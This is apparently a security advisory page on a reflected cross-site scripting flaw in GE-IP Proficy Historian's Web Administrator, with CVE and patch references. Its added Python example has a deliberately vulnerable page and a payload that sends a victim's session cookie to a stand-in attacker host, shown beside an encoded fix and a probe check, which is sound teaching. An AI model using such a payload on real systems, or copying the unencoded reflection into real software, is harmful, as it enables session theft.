
General Electric Intelligent Platforms (GE-IP) Proficy Historian Web Administrator Cross-Site Scripting (XSS) Vulnerability

November 1, 2011

Security researchers Billy Rios and Terry McCorkle have discovered a vulnerability in the General Electric Intelligent Platforms (GE-IP) Proficy Historian, which is also used with the Proficy HMI/SCADA CIMPLICITY and iFIX software suites.

A vulnerability has been reported in Proficy Historian which can be exploited by malicious people to conduct cross-site scripting attacks against users of a vulnerable system.

Certain unspecified input is not properly sanitised within the Web Administrator component before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Successful exploitation of this vulnerability may allow an attacker to run script in the browser of a Web Administrator user who follows a crafted link, and so to act against the Historian with that user's privileges.
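The pattern the advisory describes, input reflected into an administrative web page without output encoding, is shown below as an added illustration of the vulnerability class. This is example code written for this page, not code from the Proficy Historian Web Administrator; the page paths, the "tag" parameter, the sample inputs and the attacker URL are all constructed. It places the vulnerable rendering beside a hardened one that HTML-entity encodes the value before reflecting it, and includes the simple check a tester uses to tell the two apart: whether a probe string comes back byte-for-byte or only in encoded form.

```python
"""
Reflected XSS in an admin web page, vulnerable and hardened variants.

Hypothetical stand-in for the class of flaw described in the advisory;
not code from GE-IP Proficy Historian Web Administrator.
"""
import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Constructed sample inputs: a tag name an operator might search for,
# and an attacker-controlled value that breaks out of the page and
# ships the victim's session cookie to a (hypothetical) attacker host.
BENIGN_INPUT = "Tank1.Level"
ATTACK_INPUT = ('"><script>document.location="http://attacker.example/?c="'
                '+document.cookie</script>')

# The value is reflected into HTML text content, so HTML-entity
# encoding is the correct encoding for this context.
TEMPLATE = ("<html><body><h1>Tag search</h1>"
            "<p>Results for tag: {value}</p></body></html>")


def render_vulnerable(tag: str) -> str:
    """Echo the request parameter verbatim: the vulnerable pattern."""
    return TEMPLATE.format(value=tag)


def render_hardened(tag: str) -> str:
    """Encode <, >, &, " and ' before reflecting the parameter."""
    return TEMPLATE.format(value=html.escape(tag, quote=True))


def reflects_unencoded(body: str, probe: str) -> bool:
    """Scanner-style check: is the probe present in the response exactly
    as sent (exploitable), rather than only in an encoded form?"""
    return probe in body


class AdminHandler(BaseHTTPRequestHandler):
    """Minimal server so both variants can be exercised with a browser:
    /vulnerable?tag=... and /hardened?tag=..."""

    def do_GET(self):
        url = urlparse(self.path)
        tag = parse_qs(url.query).get("tag", [""])[0]
        if url.path == "/vulnerable":
            body = render_vulnerable(tag)
        elif url.path == "/hardened":
            body = render_hardened(tag)
        else:
            self.send_error(404)
            return
        data = body.encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


if __name__ == "__main__":
    # Show the two renderings of the attack input, then serve on
    # localhost (blocks until interrupted).
    print(render_vulnerable(ATTACK_INPUT))
    print(render_hardened(ATTACK_INPUT))
    HTTPServer(("127.0.0.1", 8080), AdminHandler).serve_forever()
```

Encoding must match the context the value lands in: the HTML-entity encoding above is right for text between tags, but a value placed inside a JavaScript block or a URL attribute needs that context's encoding instead. The check is only as good as the probe; a reflection that survives with `<` and `>` intact is exploitable, one that comes back as `&lt;script&gt;` is not, for this context.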

All versions of Proficy Historian, Proficy HMI/SCADA-CIMPLICITY 8.1 and 8.2, and Proficy HMI/SCADA-iFIX 5.0 and 5.1 are vulnerable.

SCADAhacker comment:
Billy Rios and Terry McCorkle presented at DerbyCon 2011 a session entitled "100 Bugs in 100 Days: An Analysis of ICS (SCADA) Software", which covers this and the related GE-IP findings.

ICS-CERT Advisories / Alerts

ICSA-11-243-02

Additional related Advisories:
ICSA-11-243-01
ICSA-11-243-03

Vendor Website (includes Patches / Hotfixes)

Proficy Security Advisory Information (GEIP11-01, GEIP11-02, GEIP11-03)
GEIP11-03: Security Advisory - Proficy Historian Web Administrator 
Vendor Homepage
GE-IP Automation and HMI/SCADA Product Information (includes trial DVD links)
Proficy Historian Product Information (includes free download)

Related links:
GEIP11-01: Security Advisory - Proficy Historian ihDataArchiver 
GEIP11-02: Security Advisory - Proficy Plant Applications services 
Patch: Proficy Plant Applications 5.0 SIM 43 (signon required)
Patch: Proficy Plant Applications 4.4.1 SIM v101 (signon required)
Patch: Proficy Historian 4.0 SIM 12 (signon required)
Patch: Proficy Historian 3.5 SIM 17 (signon required)
Patch: Proficy Historian 3.1 SIM IH31_11092015699 (signon required)

Exploit Proof-of-Concept

No public exploit is available at this time.

Common Vulnerability & Exposure (CVE) References

CVE-2011-3320
NVD CVE-2011-3320

Related references:
CVE-2011-1919
NVD CVE-2011-1919
CVE-2011-1918
NVD CVE-2011-1918

Additional Information

Open-Source Vulnerability Database #76767
Secunia Advisory #46699
Secunia Vulnerability Report and Statistics on Proficy Historian 3.x
Secunia Vulnerability Report and Statistics on Proficy Historian 4.x
Security Focus Vulnerability Info and Exploit Bugtraq ID 50473
Packet Storm Advisory #106515

GE Works to Fix Vulnerabilities (ISSSource)

Related information:
SCADAhacker Reference - GE-IP Proficy Plant Applications Buffer Overflow Vulnerabilities
SCADAhacker Reference - GE-IP Proficy Historian Data Archiver Buffer Overflow Vulnerability
Open-Source Vulnerability Database #76762
Open-Source Vulnerability Database #76763
Open-Source Vulnerability Database #76764
Open-Source Vulnerability Database #76765
Open-Source Vulnerability Database #76766
Secunia Advisory #46700
Secunia Vulnerability Report and Statistics on Proficy Plant Applications 4.x
Secunia Vulnerability Report and Statistics on Proficy Plant Applications 5.x
Security Focus Vulnerability Info and Exploit Bugtraq ID 50474
Security Focus Vulnerability Info and Exploit Bugtraq ID 50475
Packet Storm Advisory #106517